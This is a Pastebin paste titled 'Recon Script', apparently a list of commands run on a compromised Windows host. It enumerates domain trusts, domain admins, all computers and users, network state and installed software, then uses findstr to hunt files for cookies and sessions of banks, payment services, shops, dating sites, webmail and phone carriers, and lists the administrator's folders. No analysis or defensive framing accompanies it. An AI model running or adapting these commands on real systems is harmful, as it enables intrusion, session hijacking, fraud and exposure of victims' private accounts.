SHARE
TWEET

Recon Script

a guest Feb 28th, 2020 619 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. nltest /domain_trusts
  2. net config workstation
  3. net view /all
  4. net view /all /domain
  5. net group “domain admins” /domain
  6. dsquery * -filter “objectcategory=computer” -attr dNSHostName distinguishedName description operatingSystem -limit 0
  7. dsquery * -filter “&(objectcategory=person)(samaccountname=*)” -attr sAMAccountName mail comment description -limit 0
  8. net session
  9. net user
  10. systeminfo | find /V “KB”
  11. ipconfig /all
  12. netstat -an | find /i “listening”
  13. net config workstation
  14. reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall”
  15. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime” /v DisplayName
  16. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore” /v DisplayName
  17. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40” /v DisplayName
  18. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data” /v DisplayName
  19. REG QUERY “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX” /v DisplayName
  20. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData" /v DisplayName
  21. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack" /v DisplayName
  22. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2" /v DisplayName
  23. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent" /v DisplayName
  24. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC" /v DisplayName
  25. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0040E310-5FEB-4626-BA89-7678B473DEF8}" /v DisplayName
  26. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5525C0AB-E025-4951-9C84-DD490DD95B0F}" /v DisplayName
  27. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D339C288-2EEA-49A3-B10F-979FC2715A2C}" /v DisplayName
  28. REG  QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F383A96C-9EF4-4ED9-BE86-85A938DCE021}" /v DisplayName
  29. tasklist
  30. ipconfig | find "IPv4"
  31. findstr  /m cookie_check.paypal.com *
  32. findstr  /m paypal.comcookie_check *
  33. findstr  /m account.skrill.com *
  34. findstr  /m westernunion.com *
  35. findstr  /m neteller.com *
  36. findstr  /m entropay.com *
  37. findstr  /m 2checkout.com *
  38. findstr  /m wepay.com *
  39. findstr  /m .v.me *
  40. findstr  /m gopayment.com *
  41. findstr  /m dwolla.com *
  42. findstr  /m aib.ie *
  43. findstr  /m barclaycardus.com *
  44. findstr  /m capitalone.com *
  45. findstr  /m chase.com *
  46. findstr  /m coinbase.com *
  47. findstr  /m liqpay.com *
  48. findstr  /m moneybookers.com *
  49. findstr  /m open24.ie *
  50. findstr  /m payeer.com *
  51. findstr  /m paysurfer.com *
  52. findstr  /m perfectmoney.com *
  53. findstr  /m suntrust.com *
  54. findstr  /m wellsfargo.com *
  55. findstr  /m sears.com *
  56. findstr  /m overstock.com *
  57. findstr  /m ebay.comnonsession *
  58. findstr  /m dell.com *
  59. findstr  /m amazon.comsession *
  60. findstr  /m apple.comdssid *
  61. findstr  /m beacon.walmart.com *
  62. findstr  /m bestbuy.comcontext_id *
  63. findstr  /m newegg.coms_per *
  64. findstr  /m airbnb.com *
  65. findstr  /m bhphotovideo.com *
  66. findstr  /m farfetch.com *
  67. findstr  /m lowes.com *
  68. findstr  /m officedepot.com *
  69. findstr  /m qvc.com *
  70. findstr  /m steampowered.com *
  71. findstr  /m target.com *
  72. findstr  /m match.com *
  73. findstr  /m mysinglefriend.com *
  74. findstr  /m friendfinder.com *
  75. findstr  /m jdate.com *
  76. findstr  /m gay.com *
  77. findstr  /m christianconnection.com *
  78. findstr  /m muddymatches.co.uk *
  79. findstr  /m zoosk.com *
  80. findstr  /m shaadi.com *
  81. findstr  /m datingdirect.com *
  82. findstr  /m lovearts.com *
  83. findstr  /m amateurmatch.com *
  84. findstr  /m cupid.com *
  85. findstr  /m datehookup.com *
  86. findstr  /m meetic.com *
  87. findstr  /m meetme.com *
  88. findstr  /m accounts.google.com *
  89. findstr  /m mail.live.com *
  90. findstr  /m login.yahoo.com *
  91. findstr  /m att.com *
  92. findstr  /m sprint.com *
  93. findstr  /m verizonwireless.com *
  94. findstr  /m vzw.com *
  95. findstr  /m verizon.com *
  96. findstr  /m craiglist.org *
  97. findstr  /m indeed.com *
  98. findstr  /m sendspace.com *
  99. findstr  /m swiftunlocks.com *
  100. findstr  /m ups.com *
  101. findstr  /m whoer.net *
  102. findstr  /m fedex.com *
  103. powershell  Get-ChildItem -Path C:\ -ErrorAction SilentlyContinue
  104. powershell  Get-ChildItem -Path \"C:\Program Files\" -ErrorAction SilentlyContinue
  105. powershell  Get-ChildItem -Path \"C:\Program Files (x86) \" -ErrorAction SilentlyContinue
  106. powershell  Get-ChildItem -Path \"C:\Users\administrator\AppData\Roaming\" -ErrorAction SilentlyContinue
  107. powershell  Get-ChildItem -Path \"C:\Users\administrator\AppData\Local\" -ErrorAction SilentlyContinue
  108. powershell  Get-ChildItem -Path \"C:\Users\administrator\Desktop\" -ErrorAction SilentlyContinue
  109. powershell  Get-ChildItem -Path \"C:\Users\administrator\Downloads\" -ErrorAction SilentlyContinue
  110. powershell  Get-ChildItem -Path \"C:\Users\administrator\Documents\" -ErrorAction SilentlyContinue
  111. C:\Windows\system32\cmd.exe  /S /D /c" TYPE win_install.log.txt "
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top